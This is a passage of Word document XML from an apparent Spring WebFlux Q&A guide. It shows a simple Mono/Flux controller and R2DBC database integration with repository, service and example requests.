      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive REST API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Spring WebFlux. By leveraging Mono and Flux, we can process requests asynchronously, making the application more scalable and efficient compared to traditional blocking APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBA2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322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E609989" w14:textId="252FEDB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6" w:name="_Toc197867750"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you give an example of creating a simple controller using Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>
    </w:p>
    <w:p w14:paraId="0A8F1192" w14:textId="41EF3C4D"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ertainly! Here's an example of creating a simple controller using Mono and Flux in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1B3F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Spring WebFlux Dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F816E0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that your project includes the Spring WebFlux dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367134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745C6E7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90721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1A3BE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1C811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336459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DAFF7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0B864ED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3A8A8D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706A19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3159E8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134B4A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Simple Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03DF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Item model which will be returned from the API. This could be any object that represents your resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D95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804C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4A14B5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177A7A9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BEF0D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482A421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ublic Item(String id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183672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7BCCD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7B9435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E3227" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A36FF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7AFB4C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15C288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F2A232" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11453DE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28652D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C8E51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D0CDDD" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07764C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0558A0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4C9E12E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747FD42" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCBC8E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57E756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60F808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6051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8345F38"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Controller Using Mono and Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35CA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ll create a simple controller with two endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6A8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s: Returns a list of Item objects (using Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BB3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id}: Returns a single Item object (using Mono).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA473E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BFE4D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5DE4B5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BFDA9EA" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6C574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05C9C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BF4666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A0A56E9" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B517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 single item (Mono)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F1CC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D10338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7196443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fetching an item by ID (in real case, fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4F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Item " + id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10FB7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28B8248" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D11E8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ll items (Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43167EF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110D9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E77466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 list of items (in real case, fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D39B4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20F8DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE7C1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291AFF6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5011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FC78D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3C4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DE814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xplanation of the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03119F2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613CE18"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ItemById endpoint uses Mono&lt;Item&gt; to return a single Item. In a real scenario, you might fetch the item from a database, but here we use Mono.just() to return a predefined item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D665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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05CC72"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Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303E98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1821ADD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aven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17D35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3014C66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Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CC7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0D56B75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run at http://localhost:8080, and you can test the endpoints using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52C326E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Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7E6D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es all items (returns a Flux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EF90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7C4378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37B377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0C67A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCDE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3","name":"Item 3"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C3E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17D9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es a single item by its ID (returns a Mono):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF098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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F1E8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53E446B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7AA4F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 "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371860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ame": "Item 1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A443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87DC3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What Makes It Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C188C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 and Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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0B70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is a simple example of how to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F171B74" w14:textId="496071F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7" w:name="_Toc197867751"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you integrate a database with a Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p w14:paraId="70F26D86" w14:textId="4015B39D" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98"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integrate a database with a Spring WebFlux application, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Database access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> libraries such as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for SQL databases or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for NoSQL databases. In this example, I'll walk you through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ith a Spring WebFlux application to interact with a relational database in a reactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6091B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ntegrate a Database with Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C2B97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0752464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add the appropriate dependencies to your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FCEA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48882FA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B9979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Boot WebFlux Starter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1AC2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95F40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0BEF8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094FFF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CF934B2" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6784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Starter for Reactive Database Connectivity --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BBB4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2C2E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groupId&gt;io.r2dbc&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550FBF1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58229C2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2CDC3AF" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD8F4E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203824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4CCC4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EAC3BC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07EF0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0E40871" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7724D0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for Development (Optional) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71353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413AD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41E230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1D6F40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0182B9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4DEA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392A4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E17025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3C2823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WebFlux Starter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809C54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09E12994" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E04D9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2DBC PostgreSQL Driver (or any other R2DBC driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27285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684258E8" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54599F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Data R2DBC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5983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3E297DE4" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CF6C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H2 Database (for development and testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C8C5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32F0F07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453581"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figure Database Connection (application.yml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A228B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you need to configure the database connection in your application.yml or application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CED6F"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5A0DAC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598FD66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7E221F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7E163D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63CBB2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2E595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CA7F5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62798C9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6C1286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1DBD83BC"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0A738A8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0D9739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7D842F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531DF2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3F0009C3"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Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83519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domain model that corresponds to a table in your database. For instance, an Item model might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDEAA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583A596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51856185" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FB0AA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2DD377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4A6534D" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD6743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D34064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1FE22F3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339D46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1C974113" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A849D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6024E7E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Long getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1C1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29D35A2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C36CE8F" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9F11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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F35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75B3C6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2293F4B" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536DEE1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3B5404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137F7A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B242D95" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F5B99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2EDED26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353B1B8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9CD168" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161A4CD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0A018C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788061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03427EB" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEC62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569432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E712C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D60A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67ECA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Repository for Database Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE88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repositories are used to interact with the database. We will create a repository interfa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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEDB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7C769A55" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0BAD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74038D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475777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1A0D3F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activeCrudRepository provides methods like save(), findById(), findAll(), and more, which will be executed in a non-blocking, reactive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F11AF4"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reate a Reactive Service Layer (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3C32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service class that uses the repository to fetch data reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82A3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0C9E5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2C76CBC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473539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75A0B8A" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14797E8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3F6FEB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05979DBD" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248AFF8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7A9E4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2173D19" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="208FB51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4423C2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2AEA4FD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7A06D289" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C7B84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72F51B7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402C5D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11D47DD" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5AA42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3F5949B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5F6D979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5E73B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48951B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reate a Reactive Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310184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ally, create a reactive controller that will expose endpoints to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80CE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76D12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6E6AAF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DE28C7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7346F00" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419339C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81D4F6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277C0B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CDC46E0" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0997F61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C792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459F3F6" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F10FB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6FF5AAB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3EA3EFC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323253F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FCC5784" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D46378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39CDD27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281032E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07E156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06B999" w14:textId="77777777" w:rsidR="00F61F98" w:rsidRPr="00B13F85" w:rsidRDefault="00F61F98" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
